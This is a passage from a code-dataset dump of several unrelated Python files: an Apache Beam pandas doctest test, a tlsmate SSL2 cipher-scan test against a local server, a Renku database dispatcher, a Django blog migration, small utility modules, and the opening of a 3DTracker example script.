ignore_index=True)\",\n ],\n 'pandas.core.frame.DataFrame.sort_index': ['*'],\n 'pandas.core.frame.DataFrame.sort_values': ['*'],\n 'pandas.core.frame.DataFrame.melt': [\n \"df.melt(id_vars=['A'], value_vars=['B'])\",\n \"df.melt(id_vars=['A'], value_vars=['B', 'C'])\",\n \"df.melt(col_level=0, id_vars=['A'], value_vars=['B'])\",\n \"df.melt(id_vars=[('A', 'D')], value_vars=[('B', 'E')])\",\n \"df.melt(id_vars=['A'], value_vars=['B'],\\n\" +\n \" var_name='myVarname', value_name='myValname')\"\n ],\n # Most keep= options are order-sensitive\n 'pandas.core.frame.DataFrame.drop_duplicates': ['*'],\n 'pandas.core.frame.DataFrame.duplicated': [\n 'df.duplicated()',\n \"df.duplicated(keep='last')\",\n \"df.duplicated(subset=['brand'])\",\n ],\n 'pandas.core.frame.DataFrame.reindex': ['*'],\n 'pandas.core.frame.DataFrame.dot': [\n # reindex not supported\n 's2 = s.reindex([1, 0, 2, 3])',\n ],\n 'pandas.core.frame.DataFrame.resample': ['*'],\n 'pandas.core.frame.DataFrame.values': ['*'],\n },\n not_implemented_ok={\n 'pandas.core.frame.DataFrame.transform': [\n # str arg not supported. Tested with np.sum in\n # frames_test.py::DeferredFrameTest::test_groupby_transform_sum\n \"df.groupby('Date')['Data'].transform('sum')\",\n ],\n 'pandas.core.frame.DataFrame.swaplevel': ['*'],\n 'pandas.core.frame.DataFrame.melt': ['*'],\n 'pandas.core.frame.DataFrame.reindex_axis': ['*'],\n 'pandas.core.frame.DataFrame.round': [\n 'df.round(decimals)',\n ],\n\n # We should be able to support pivot and pivot_table for categorical\n # columns\n 'pandas.core.frame.DataFrame.pivot': ['*'],\n\n # Trivially elementwise for axis=columns. 
Relies on global indexing\n # for axis=rows.\n # Difficult to determine proxy, need to inspect function\n 'pandas.core.frame.DataFrame.apply': ['*'],\n\n # Cross-join not implemented\n 'pandas.core.frame.DataFrame.merge': [\n \"df1.merge(df2, how='cross')\"\n ],\n\n # TODO(BEAM-11711)\n 'pandas.core.frame.DataFrame.set_index': [\n \"df.set_index([s, s**2])\",\n ],\n\n 'pandas.core.frame.DataFrame.set_axis': [\n \"df.set_axis(range(0,2), axis='index')\",\n ],\n\n # TODO(BEAM-12495)\n 'pandas.core.frame.DataFrame.value_counts': [\n 'df.value_counts(dropna=False)'\n ],\n },\n skip={\n # DataFrame construction from a dictionary and\n # Series requires using the len() function, which\n # is a non-deferred operation that we do not allow\n 'pandas.core.frame.DataFrame': [\n 'pd.DataFrame(data=d, index=[0, 1, 2, 3])',\n ],\n # s2 created with reindex\n 'pandas.core.frame.DataFrame.dot': [\n 'df.dot(s2)',\n ],\n\n 'pandas.core.frame.DataFrame.resample': ['df'],\n 'pandas.core.frame.DataFrame.asfreq': ['*'],\n # Throws NotImplementedError when modifying df\n 'pandas.core.frame.DataFrame.axes': [\n # Returns deferred index.\n 'df.axes',\n ],\n # Skipped because the relies on loc to set cells in df2\n 'pandas.core.frame.DataFrame.compare': ['*'],\n 'pandas.core.frame.DataFrame.cov': [\n # Relies on setting entries ahead of time.\n \"df.loc[df.index[:5], 'a'] = np.nan\",\n \"df.loc[df.index[5:10], 'b'] = np.nan\",\n 'df.cov(min_periods=12)',\n ],\n 'pandas.core.frame.DataFrame.rename': [\n # Returns deferred index.\n 'df.index',\n 'df.rename(index=str).index',\n ],\n 'pandas.core.frame.DataFrame.set_index': [\n # TODO(BEAM-11711): This could pass in the index as\n # a DeferredIndex, and we should fail it as order-sensitive.\n \"df.set_index([pd.Index([1, 2, 3, 4]), 'year'])\",\n ],\n 'pandas.core.frame.DataFrame.set_axis': [\n # This should pass as set_axis(axis='columns')\n # and fail with set_axis(axis='index')\n \"df.set_axis(['a', 'b', 'c'], axis='index')\"\n ],\n 'pandas.core.frame.DataFrame.to_markdown': ['*'],\n 'pandas.core.frame.DataFrame.to_parquet': ['*'],\n\n # Raises right exception, but testing framework has matching issues.\n # Tested in `frames_test.py`.\n 'pandas.core.frame.DataFrame.insert': [\n 'df',\n 'df.insert(1, \"newcol\", [99, 99])',\n 'df.insert(0, \"col1\", [100, 100], allow_duplicates=True)'\n ],\n\n 'pandas.core.frame.DataFrame.to_records': [\n 'df.index = df.index.rename(\"I\")',\n 'index_dtypes = f\"<S{df.index.str.len().max()}\"', # 1.x\n 'index_dtypes = \"<S{}\".format(df.index.str.len().max())', #0.x\n 'df.to_records(index_dtypes=index_dtypes)',\n ],\n # These tests use the static method pd.pivot_table, which doesn't\n # actually raise NotImplementedError\n 'pandas.core.frame.DataFrame.pivot_table': ['*'],\n # Expected to raise a ValueError, but we raise NotImplementedError\n 'pandas.core.frame.DataFrame.pivot': [\n \"df.pivot(index='foo', columns='bar', values='baz')\"\n ],\n 'pandas.core.frame.DataFrame.append': [\n 'df',\n # pylint: disable=line-too-long\n \"pd.concat([pd.DataFrame([i], columns=['A']) for i in range(5)],\\n\"\n \" ignore_index=True)\"\n ],\n 'pandas.core.frame.DataFrame.eval': ['df'],\n 'pandas.core.frame.DataFrame.melt': [\n \"df.columns = [list('ABC'), list('DEF')]\", \"df\"\n ],\n 'pandas.core.frame.DataFrame.merge': [\n # Order-sensitive index, checked in frames_test.py.\n \"df1.merge(df2, left_on='lkey', right_on='rkey')\",\n \"df1.merge(df2, left_on='lkey', right_on='rkey',\\n\"\n \" suffixes=('_left', '_right'))\",\n \"df1.merge(df2, 
how='left', on='a')\",\n ],\n # Raises right exception, but testing framework has matching issues.\n 'pandas.core.frame.DataFrame.replace': [\n \"df.replace({'a string': 'new value', True: False}) # raises\"\n ],\n 'pandas.core.frame.DataFrame.to_sparse': ['type(df)'],\n\n # Skipped because \"seen_wont_implement\" is reset before getting to\n # these calls, so the NameError they raise is not ignored.\n 'pandas.core.frame.DataFrame.T': [\n 'df1_transposed.dtypes', 'df2_transposed.dtypes'\n ],\n 'pandas.core.frame.DataFrame.transpose': [\n 'df1_transposed.dtypes', 'df2_transposed.dtypes'\n ],\n # Skipped because the relies on iloc to set a cell to NA. Test is\n # replicated in frames_test::DeferredFrameTest::test_applymap.\n 'pandas.core.frame.DataFrame.applymap': [\n 'df_copy.iloc[0, 0] = pd.NA',\n \"df_copy.applymap(lambda x: len(str(x)), na_action='ignore')\",\n ],\n # Skipped so we don't need to install natsort\n 'pandas.core.frame.DataFrame.sort_values': [\n 'from natsort import index_natsorted',\n 'df.sort_values(\\n'\n ' by=\"time\",\\n'\n ' key=lambda x: np.argsort(index_natsorted(df[\"time\"]))\\n'\n ')'\n ],\n # Mode that we don't yet support, documentation added in pandas\n # 1.2.0 (https://github.com/pandas-dev/pandas/issues/35912)\n 'pandas.core.frame.DataFrame.aggregate': [\n \"df.agg(x=('A', max), y=('B', 'min'), z=('C', np.mean))\"\n ],\n })\n self.assertEqual(result.failed, 0)\n\n def test_series_tests(self):\n result = doctests.testmod(\n pd.core.series,\n use_beam=False,\n report=True,\n wont_implement_ok={\n 'pandas.core.series.Series.__array__': ['*'],\n 'pandas.core.series.Series.array': ['*'],\n 'pandas.core.series.Series.cummax': ['*'],\n 'pandas.core.series.Series.cummin': ['*'],\n 'pandas.core.series.Series.cumsum': ['*'],\n 'pandas.core.series.Series.cumprod': ['*'],\n 'pandas.core.series.Series.diff': ['*'],\n 'pandas.core.series.Series.dot': [\n 's.dot(arr)', # non-deferred result\n ],\n 'pandas.core.series.Series.fillna': [\n 'df.fillna(method=\\'ffill\\')',\n 'df.fillna(method=\"ffill\")',\n 'df.fillna(value=values, limit=1)',\n ],\n 'pandas.core.series.Series.info': ['*'],\n 'pandas.core.series.Series.items': ['*'],\n 'pandas.core.series.Series.iteritems': ['*'],\n # default keep is 'first'\n 'pandas.core.series.Series.nlargest': [\n \"s.nlargest()\",\n \"s.nlargest(3)\",\n \"s.nlargest(3, keep='last')\",\n ],\n 'pandas.core.series.Series.memory_usage': ['*'],\n 'pandas.core.series.Series.nsmallest': [\n \"s.nsmallest()\",\n \"s.nsmallest(3)\",\n \"s.nsmallest(3, keep='last')\",\n ],\n 'pandas.core.series.Series.pop': ['*'],\n 'pandas.core.series.Series.searchsorted': ['*'],\n 'pandas.core.series.Series.shift': [\n 'df.shift(periods=3)',\n 'df.shift(periods=3, fill_value=0)',\n ],\n 'pandas.core.series.Series.take': ['*'],\n 'pandas.core.series.Series.to_dict': ['*'],\n 'pandas.core.series.Series.unique': ['*'],\n 'pandas.core.series.Series.unstack': ['*'],\n 'pandas.core.series.Series.values': ['*'],\n 'pandas.core.series.Series.view': ['*'],\n 'pandas.core.series.Series.append': [\n 's1.append(s2, ignore_index=True)',\n ],\n 'pandas.core.series.Series.replace': [\n \"s.replace([1, 2], method='bfill')\",\n # Relies on method='pad'\n \"s.replace('a')\",\n # Relies on method='pad'\n # value=None is not valid for pandas < 1.4\n \"s.replace('a', None)\",\n # Implicitly uses method='pad', but output doesn't rely on that\n # behavior. 
Verified indepently in\n # frames_test.py::DeferredFrameTest::test_replace\n \"df.replace(regex={r'^ba.$': 'new', 'foo': 'xyz'})\"\n ],\n 'pandas.core.series.Series.sort_index': ['*'],\n 'pandas.core.series.Series.sort_values': ['*'],\n 'pandas.core.series.Series.argmax': ['*'],\n 'pandas.core.series.Series.argmin': ['*'],\n 'pandas.core.series.Series.drop_duplicates': [\n 's.drop_duplicates()',\n \"s.drop_duplicates(keep='last')\",\n ],\n 'pandas.core.series.Series.reindex': ['*'],\n 'pandas.core.series.Series.autocorr': ['*'],\n 'pandas.core.series.Series.repeat': ['s.repeat([1, 2, 3])'],\n 'pandas.core.series.Series.resample': ['*'],\n 'pandas.core.series.Series': ['ser.iloc[0] = 999'],\n },\n not_implemented_ok={\n 'pandas.core.series.Series.transform': [\n # str arg not supported. Tested with np.sum in\n # frames_test.py::DeferredFrameTest::test_groupby_transform_sum\n \"df.groupby('Date')['Data'].transform('sum')\",\n ],\n 'pandas.core.series.Series.groupby': [\n 'ser.groupby([\"a\", \"b\", \"a\", \"b\"]).mean()',\n 'ser.groupby([\"a\", \"b\", \"a\", np.nan]).mean()',\n 'ser.groupby([\"a\", \"b\", \"a\", np.nan], dropna=False).mean()',\n ],\n 'pandas.core.series.Series.swaplevel' :['*']\n },\n skip={\n # Relies on setting values with iloc\n 'pandas.core.series.Series': ['ser', 'r'],\n 'pandas.core.series.Series.groupby': [\n # TODO(BEAM-11393): This example requires aligning two series\n # with non-unique indexes. It only works in pandas because\n # pandas can recognize the indexes are identical and elide the\n # alignment.\n 'ser.groupby(ser > 100).mean()',\n ],\n 'pandas.core.series.Series.asfreq': ['*'],\n # error formatting\n 'pandas.core.series.Series.append': [\n 's1.append(s2, verify_integrity=True)',\n ],\n 'pandas.core.series.Series.cov': [\n # Differs in LSB on jenkins.\n \"s1.cov(s2)\",\n ],\n # Skipped idxmax/idxmin due an issue with the test framework\n 'pandas.core.series.Series.idxmin': ['s.idxmin()'],\n 'pandas.core.series.Series.idxmax': ['s.idxmax()'],\n 'pandas.core.series.Series.duplicated': ['*'],\n 'pandas.core.series.Series.set_axis': ['*'],\n 'pandas.core.series.Series.nonzero': ['*'],\n 'pandas.core.series.Series.pop': ['ser'], # testing side effect\n # Raises right exception, but testing framework has matching issues.\n 'pandas.core.series.Series.replace': [\n \"df.replace({'a string': 'new value', True: False}) # raises\"\n ],\n 'pandas.core.series.Series.searchsorted': [\n # This doctest seems to be incorrectly parsed.\n \"x = pd.Categorical(['apple', 'bread', 'bread',\"\n ],\n 'pandas.core.series.Series.to_csv': ['*'],\n 'pandas.core.series.Series.to_markdown': ['*'],\n 'pandas.core.series.Series.update': ['*'],\n 'pandas.core.series.Series.view': [\n # Inspection after modification.\n 's'\n ],\n 'pandas.core.series.Series.resample': ['df'],\n })\n self.assertEqual(result.failed, 0)\n\n def test_string_tests(self):\n if PD_VERSION < (1, 2):\n module = pd.core.strings\n else:\n # Definitions were moved to accessor in pandas 1.2.0\n module = pd.core.strings.accessor\n\n module_name = module.__name__\n\n result = doctests.testmod(\n module,\n use_beam=False,\n wont_implement_ok={\n # These methods can accept deferred series objects, but not lists\n f'{module_name}.StringMethods.cat': [\n \"s.str.cat(['A', 'B', 'C', 'D'], sep=',')\",\n \"s.str.cat(['A', 'B', 'C', 'D'], sep=',', na_rep='-')\",\n \"s.str.cat(['A', 'B', 'C', 'D'], na_rep='-')\"\n ],\n f'{module_name}.StringMethods.repeat': [\n 's.str.repeat(repeats=[1, 2, 3])'\n ],\n f'{module_name}.str_repeat': 
['s.str.repeat(repeats=[1, 2, 3])'],\n # get_dummies pandas examples are not casted to CategoricalDtype\n # Must be CategoricalDtype to work in Beam\n f'{module_name}.StringMethods.get_dummies': ['*'],\n f'{module_name}.str_get_dummies': ['*'],\n f'{module_name}.StringMethods': ['s.str.split(\"_\")'],\n f'{module_name}.StringMethods.rsplit': ['*'],\n f'{module_name}.StringMethods.split': ['*'],\n },\n skip={\n # count() on Series with a NaN produces mismatched type if we\n # have a NaN-only partition.\n f'{module_name}.StringMethods.count': [\"s.str.count('a')\"],\n f'{module_name}.str_count': [\"s.str.count('a')\"],\n\n # Bad test strings in pandas 1.1.x\n f'{module_name}.str_replace': [\n \"pd.Series(['foo', 'fuz', np.nan]).str.replace('f', repr)\"\n ],\n f'{module_name}.StringMethods.replace': [\n \"pd.Series(['foo', 'fuz', np.nan]).str.replace('f', repr)\"\n ],\n\n # output has incorrect formatting in 1.2.x\n f'{module_name}.StringMethods.extractall': ['*']\n })\n self.assertEqual(result.failed, 0)\n\n def test_datetime_tests(self):\n # TODO(BEAM-10721)\n indexes_accessors_result = doctests.testmod(\n pd.core.indexes.accessors,\n use_beam=False,\n skip={\n 'pandas.core.indexes.accessors.TimedeltaProperties': [\n # Seems like an upstream bug. The property is 'second'\n 'seconds_series.dt.seconds'\n ],\n\n # TODO(BEAM-12530): Test data creation fails for these\n # s = pd.Series(pd.to_timedelta(np.arange(5), unit=\"d\"))\n # pylint: disable=line-too-long\n 'pandas.core.indexes.accessors.DatetimeProperties.to_pydatetime': [\n '*'\n ],\n 'pandas.core.indexes.accessors.TimedeltaProperties.components': [\n '*'\n ],\n 'pandas.core.indexes.accessors.TimedeltaProperties.to_pytimedelta': [\n '*'\n ],\n # pylint: enable=line-too-long\n })\n datetimelike_result = doctests.testmod(\n pd.core.arrays.datetimelike, use_beam=False)\n\n datetime_result = doctests.testmod(\n pd.core.arrays.datetimes,\n use_beam=False,\n wont_implement_ok={\n 'pandas.core.arrays.datetimes.DatetimeArray.to_period': ['*'],\n # All tz_localize tests use unsupported values for ambiguous=\n # Verified seperately in\n # frames_test.py::DeferredFrameTest::test_dt_tz_localize_*\n 'pandas.core.arrays.datetimes.DatetimeArray.tz_localize': ['*'],\n },\n not_implemented_ok={\n # Verifies index version of this method\n 'pandas.core.arrays.datetimes.DatetimeArray.to_period': [\n 'df.index.to_period(\"M\")'\n ],\n })\n\n self.assertEqual(indexes_accessors_result.failed, 0)\n self.assertEqual(datetimelike_result.failed, 0)\n self.assertEqual(datetime_result.failed, 0)\n\n def test_indexing_tests(self):\n result = doctests.testmod(\n pd.core.indexing,\n use_beam=False,\n skip={\n 'pandas.core.indexing._IndexSlice': ['*'],\n 'pandas.core.indexing.IndexingMixin.at': ['*'],\n 'pandas.core.indexing.IndexingMixin.iat': ['*'],\n 'pandas.core.indexing.IndexingMixin.iloc': ['*'],\n 'pandas.core.indexing.IndexingMixin.loc': ['*'],\n 'pandas.core.indexing._AtIndexer': ['*'],\n 'pandas.core.indexing._LocIndexer': ['*'],\n 'pandas.core.indexing._iAtIndexer': ['*'],\n 'pandas.core.indexing._iLocIndexer': ['*'],\n })\n self.assertEqual(result.failed, 0)\n\n def test_groupby_tests(self):\n result = doctests.testmod(\n pd.core.groupby.groupby,\n use_beam=False,\n wont_implement_ok={\n 'pandas.core.groupby.groupby.GroupBy.head': ['*'],\n 'pandas.core.groupby.groupby.GroupBy.tail': ['*'],\n 'pandas.core.groupby.groupby.GroupBy.nth': ['*'],\n 'pandas.core.groupby.groupby.GroupBy.cumcount': ['*'],\n 'pandas.core.groupby.groupby.GroupBy.resample': ['*'],\n 
},\n not_implemented_ok={\n 'pandas.core.groupby.groupby.GroupBy.ngroup': ['*'],\n 'pandas.core.groupby.groupby.GroupBy.sample': ['*'],\n 'pandas.core.groupby.groupby.GroupBy.rank': ['*'],\n 'pandas.core.groupby.groupby.GroupBy.nth': [\n \"df.groupby('A', as_index=False).nth(1)\",\n ],\n },\n skip={\n # Uses iloc to mutate a DataFrame\n 'pandas.core.groupby.groupby.GroupBy.resample': [\n 'df.iloc[2, 0] = 5',\n 'df',\n ],\n # df is reassigned\n 'pandas.core.groupby.groupby.GroupBy.rank': ['df'],\n # TODO: Raise wont implement for list passed as a grouping column\n # Currently raises unhashable type: list\n 'pandas.core.groupby.groupby.GroupBy.ngroup': [\n 'df.groupby([\"A\", [1,1,2,3,2,1]]).ngroup()'\n ],\n })\n self.assertEqual(result.failed, 0)\n\n result = doctests.testmod(\n pd.core.groupby.generic,\n use_beam=False,\n wont_implement_ok={\n # Returns an array by default, not a Series. WontImplement\n # (non-deferred)\n 'pandas.core.groupby.generic.SeriesGroupBy.unique': ['*'],\n # TODO: Is take actually deprecated?\n 'pandas.core.groupby.generic.DataFrameGroupBy.take': ['*'],\n 'pandas.core.groupby.generic.SeriesGroupBy.take': ['*'],\n 'pandas.core.groupby.generic.SeriesGroupBy.nsmallest': [\n \"s.nsmallest(3, keep='last')\",\n \"s.nsmallest(3)\",\n \"s.nsmallest()\",\n ],\n 'pandas.core.groupby.generic.SeriesGroupBy.nlargest': [\n \"s.nlargest(3, keep='last')\",\n \"s.nlargest(3)\",\n \"s.nlargest()\",\n ],\n 'pandas.core.groupby.generic.DataFrameGroupBy.diff': ['*'],\n 'pandas.core.groupby.generic.SeriesGroupBy.diff': ['*'],\n 'pandas.core.groupby.generic.DataFrameGroupBy.hist': ['*'],\n 'pandas.core.groupby.generic.DataFrameGroupBy.fillna': [\n 'df.fillna(method=\\'ffill\\')',\n 'df.fillna(method=\"ffill\")',\n 'df.fillna(value=values, limit=1)',\n ],\n 'pandas.core.groupby.generic.SeriesGroupBy.fillna': [\n 'df.fillna(method=\\'ffill\\')',\n 'df.fillna(method=\"ffill\")',\n 'df.fillna(value=values, limit=1)',\n ],\n },\n not_implemented_ok={\n 'pandas.core.groupby.generic.DataFrameGroupBy.idxmax': ['*'],\n 'pandas.core.groupby.generic.DataFrameGroupBy.idxmin': ['*'],\n 'pandas.core.groupby.generic.SeriesGroupBy.transform': ['*'],\n 'pandas.core.groupby.generic.SeriesGroupBy.idxmax': ['*'],\n 'pandas.core.groupby.generic.SeriesGroupBy.idxmin': ['*'],\n 'pandas.core.groupby.generic.SeriesGroupBy.apply': ['*'],\n },\n skip={\n 'pandas.core.groupby.generic.SeriesGroupBy.cov': [\n # Floating point comparison fails\n 's1.cov(s2)',\n ],\n 'pandas.core.groupby.generic.DataFrameGroupBy.cov': [\n # Mutates input DataFrame with loc\n # TODO: Replicate in frames_test.py\n \"df.loc[df.index[:5], 'a'] = np.nan\",\n \"df.loc[df.index[5:10], 'b'] = np.nan\",\n \"df.cov(min_periods=12)\",\n ],\n # These examples rely on grouping by a list\n 'pandas.core.groupby.generic.SeriesGroupBy.aggregate': ['*'],\n 'pandas.core.groupby.generic.DataFrameGroupBy.aggregate': ['*'],\n 'pandas.core.groupby.generic.SeriesGroupBy.transform': [\n # Dropping invalid columns during a transform is unsupported.\n 'grouped.transform(lambda x: (x - x.mean()) / x.std())'\n ],\n 'pandas.core.groupby.generic.DataFrameGroupBy.transform': [\n # Dropping invalid columns during a transform is unsupported.\n 'grouped.transform(lambda x: (x - x.mean()) / x.std())'\n ],\n # Skipped idxmax/idxmin due an issue with the test framework\n 'pandas.core.groupby.generic.SeriesGroupBy.idxmin': ['s.idxmin()'],\n 'pandas.core.groupby.generic.SeriesGroupBy.idxmax': ['s.idxmax()'],\n # Uses as_index, which is currently not_implemented\n 
'pandas.core.groupby.generic.DataFrameGroupBy.value_counts': [\n \"df.groupby('gender', as_index=False).value_counts()\",\n # pylint: disable=line-too-long\n \"df.groupby('gender', as_index=False).value_counts(normalize=True)\",\n ],\n })\n self.assertEqual(result.failed, 0)\n\n def test_top_level(self):\n tests = {\n name: func.__doc__\n for (name, func) in pd.__dict__.items()\n if _is_top_level_function(func) and getattr(func, '__doc__', None)\n }\n\n # IO methods are tested in io_test.py\n skip_reads = {name: ['*'] for name in dir(pd) if name.startswith('read_')}\n\n result = doctests.teststrings(\n tests,\n use_beam=False,\n report=True,\n not_implemented_ok={\n 'concat': ['pd.concat([s1, s2], ignore_index=True)'],\n 'crosstab': ['*'],\n 'cut': ['*'],\n 'eval': ['*'],\n 'get_dummies': ['*'],\n 'infer_freq': ['*'],\n 'lreshape': ['*'],\n 'melt': ['*'],\n 'merge': [\"df1.merge(df2, how='cross')\"],\n 'merge_asof': ['*'],\n 'pivot': ['*'],\n 'pivot_table': ['*'],\n 'qcut': ['*'],\n 'reset_option': ['*'],\n 'set_eng_float_format': ['*'],\n 'set_option': ['*'],\n 'to_numeric': ['*'],\n 'to_timedelta': ['*'],\n 'unique': ['*'],\n 'wide_to_long': ['*'],\n },\n wont_implement_ok={\n 'factorize': ['*'],\n 'to_datetime': ['s.head()'],\n 'to_pickle': ['*'],\n 'melt': [\n \"pd.melt(df, id_vars=['A'], value_vars=['B'])\",\n \"pd.melt(df, id_vars=['A'], value_vars=['B', 'C'])\",\n \"pd.melt(df, col_level=0, id_vars=['A'], value_vars=['B'])\",\n \"pd.melt(df, id_vars=[('A', 'D')], value_vars=[('B', 'E')])\",\n \"pd.melt(df, id_vars=['A'], value_vars=['B'],\\n\" +\n \" var_name='myVarname', value_name='myValname')\"\n ],\n },\n skip={\n # error formatting\n 'concat': ['pd.concat([df5, df6], verify_integrity=True)'],\n # doctest DeprecationWarning\n 'melt': ['df'],\n # Order-sensitive re-indexing.\n 'merge': [\n \"df1.merge(df2, left_on='lkey', right_on='rkey')\",\n \"df1.merge(df2, left_on='lkey', right_on='rkey',\\n\"\n \" suffixes=('_left', '_right'))\",\n \"df1.merge(df2, how='left', on='a')\",\n ],\n # Not an actual test.\n 'option_context': ['*'],\n 'factorize': ['codes', 'uniques'],\n # Bad top-level use of un-imported function.\n 'merge_ordered': [\n 'merge_ordered(df1, df2, fill_method=\"ffill\", left_by=\"group\")'\n ],\n # Expected error.\n 'pivot': [\"df.pivot(index='foo', columns='bar', values='baz')\"],\n # Never written.\n 'to_pickle': ['os.remove(\"./dummy.pkl\")'],\n **skip_reads\n })\n self.assertEqual(result.failed, 0)\n\n\nif __name__ == '__main__':\n unittest.main()\n"} {"ext": "py", "sha": "1a30aae45d6903fb960b0b90fff41853abdd4ca8", "content": "# -*- coding: utf-8 -*-\n\"\"\"Implements a class to be used for unit testing.\n\"\"\"\nimport pathlib\nfrom tlsmate.workers.eval_cipher_suites import ScanCipherSuites\nfrom tlsmate.tlssuite import TlsSuiteTester\nfrom tlsmate.tlssuite import TlsLibrary\n\nssl2_ck = [\n \"SSL_CK_RC4_128_WITH_MD5\",\n \"SSL_CK_RC2_128_CBC_WITH_MD5\",\n \"SSL_CK_IDEA_128_CBC_WITH_MD5\",\n \"SSL_CK_DES_192_EDE3_CBC_WITH_MD5\",\n]\n\n\nclass TestCase(TlsSuiteTester):\n \"\"\"Class used for tests with pytest.\n\n For more information refer to the documentation of the TcRecorder class.\n \"\"\"\n\n sp_out_yaml = \"profile_basic_ssl2\"\n recorder_yaml = \"recorder_eval_cipher_suites_ssl2\"\n path = pathlib.Path(__file__)\n server_cmd = (\n \"utils/start_openssl --version {library} --port {server_port} \"\n \"--cert1 server-rsa --cert2 server-ecdsa --no-cert-chain \"\n \"-- -www -cipher ALL -ssl2\"\n )\n library = TlsLibrary.openssl1_0_2\n\n server = 
\"localhost\"\n\n def check_versions(self, versions):\n assert len(versions) == 6\n\n assert versions[0][\"version\"][\"name\"] == \"SSL20\"\n assert versions[0][\"support\"] == \"TRUE\"\n\n assert versions[1][\"version\"][\"name\"] == \"SSL30\"\n assert versions[1][\"support\"] == \"FALSE\"\n\n assert versions[2][\"version\"][\"name\"] == \"TLS10\"\n assert versions[2][\"support\"] == \"FALSE\"\n\n assert versions[3][\"version\"][\"name\"] == \"TLS11\"\n assert versions[3][\"support\"] == \"FALSE\"\n\n assert versions[4][\"version\"][\"name\"] == \"TLS12\"\n assert versions[4][\"support\"] == \"FALSE\"\n\n assert versions[5][\"version\"][\"name\"] == \"TLS13\"\n assert versions[5][\"support\"] == \"FALSE\"\n\n for a, b in zip(ssl2_ck, versions[0][\"cipher_kinds\"]):\n assert a == b[\"name\"]\n\n def check_profile(self, profile):\n self.check_versions(profile[\"versions\"])\n\n def run(self, tlsmate, is_replaying):\n for vers in [\"sslv2\", \"sslv3\", \"tls10\", \"tls11\", \"tls12\", \"tls13\"]:\n tlsmate.config.set(vers, True)\n server_profile = tlsmate.server_profile\n ScanCipherSuites(tlsmate).run()\n\n self.check_profile(server_profile.make_serializable())\n\n\nif __name__ == \"__main__\":\n TestCase().entry(is_replaying=False)\n"} {"ext": "py", "sha": "1a30ad0c82707098faf2026373b77316b76dd85b", "content": "# -*- coding: utf-8 -*-\n#\n# Copyright 2017-2021 - Swiss Data Science Center (SDSC)\n# A partnership between École Polytechnique Fédérale de Lausanne (EPFL) and\n# Eidgenössische Technische Hochschule Zürich (ETHZ).\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\"\"\"Renku database dispatcher.\"\"\"\n\n\nfrom renku.core import errors\nfrom renku.core.management.interface.database_dispatcher import IDatabaseDispatcher\nfrom renku.core.metadata.database import Database\n\n\nclass DatabaseDispatcher(IDatabaseDispatcher):\n \"\"\"Interface for the DatabaseDispatcher.\n\n Handles getting current database (Database) and entering/exiting the stack for the database.\n \"\"\"\n\n def __init__(self):\n self.database_stack = []\n\n @property\n def current_database(self) -> Database:\n \"\"\"Get the currently active database.\"\"\"\n if len(self.database_stack) == 0:\n raise errors.ConfigurationError(\"No database configured for injection\")\n\n return self.database_stack[-1][0]\n\n def push_database_to_stack(self, path: str, commit: bool = False) -> None:\n \"\"\"Create and push a new client to the stack.\"\"\"\n new_database = Database.from_path(path)\n self.database_stack.append((new_database, commit))\n\n def pop_database(self) -> None:\n \"\"\"Remove the current client from the stack.\"\"\"\n popped_database = self.database_stack.pop()\n\n if popped_database[1]:\n popped_database[0].commit()\n\n def finalize_dispatcher(self) -> None:\n \"\"\"Close all database contexts.\"\"\"\n while self.database_stack:\n self.pop_database()\n"} {"ext": "py", "sha": "1a30ad3ef7a67f3cdaf8a458fcdfe8609d0cd219", "content": "import unittest\n\ndef suite():\n return 
unittest.TestLoader().discover(\"pypobot.tests\", pattern=\"*.py\")\n"} {"ext": "py", "sha": "1a30ad5518def96ca3d9e6b1fb20fe9db7de88f6", "content": "# Generated by Django 3.0.6 on 2020-06-12 17:51\n\nfrom django.conf import settings\nfrom django.db import migrations, models\nimport django.db.models.deletion\nimport django.utils.timezone\n\n\nclass Migration(migrations.Migration):\n\n initial = True\n\n dependencies = [\n migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Post',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('title', models.CharField(max_length=256)),\n ('text', models.TextField()),\n ('created_date', models.DateTimeField(default=django.utils.timezone.now)),\n ('published_date', models.DateTimeField(blank=True, null=True)),\n ('author', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),\n ],\n ),\n migrations.CreateModel(\n name='Comment',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('author', models.CharField(max_length=256)),\n ('text', models.TextField()),\n ('created_date', models.DateTimeField(default=django.utils.timezone.now)),\n ('isApproved', models.BooleanField(default=False)),\n ('post', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='comments', to='blog.Post')),\n ],\n ),\n ]\n"} {"ext": "py", "sha": "1a30adc331c0021f6fce98a0b56daa1d40f27413", "content": "\"\"\"Documentation about the dianna module.\"\"\"\n\n\n# FIXME: put actual code here\ndef hello(name):\n \"\"\"Say hello\n\n Function docstring using Google docstring style.\n\n Args:\n name (str): Name to say hello to\n\n Returns:\n str: Hello message\n\n Raises:\n ValueError: If `name` is equal to `nobody`\n\n Example:\n This function can be called with `Jane Smith` as argument using\n\n >>> from dianna.my_module import hello\n >>> hello('Jane Smith')\n 'Hello Jane Smith!'\n\n \"\"\"\n if name == 'nobody':\n raise ValueError('Can not say hello to nobody')\n return f'Hello {name}!'\n"} {"ext": "py", "sha": "1a30add987a1e8ecdc833b907e0f3bd1ab23df1c", "content": "\"\"\"\n[Python scripts for 3DTracker-FAB (www.3dtracker.org)]\nExample 03: Converting 2D position to 3D\n\nThis is a script demonstrating how to convert 2D positions in a ROI in a RGB image to 3D.\nThe type of conversion is useful for using 2D image based object detection/tracking \nalgorithms to obtain the corresponding 3D object position/trace.\n\nThe example plot 3D points in the ROIs surrouding a can in the 2D images\n\nDate last modified: 2018.10.03\n\"\"\"\n\nimport numpy as np\nimport cv2\n\nimport contextlib\n\nimport pyqtgraph as pg\nimport pyqtgraph.opengl as gl\n\nimport lib3dtracker as tdt # 3DTracker-FAB python 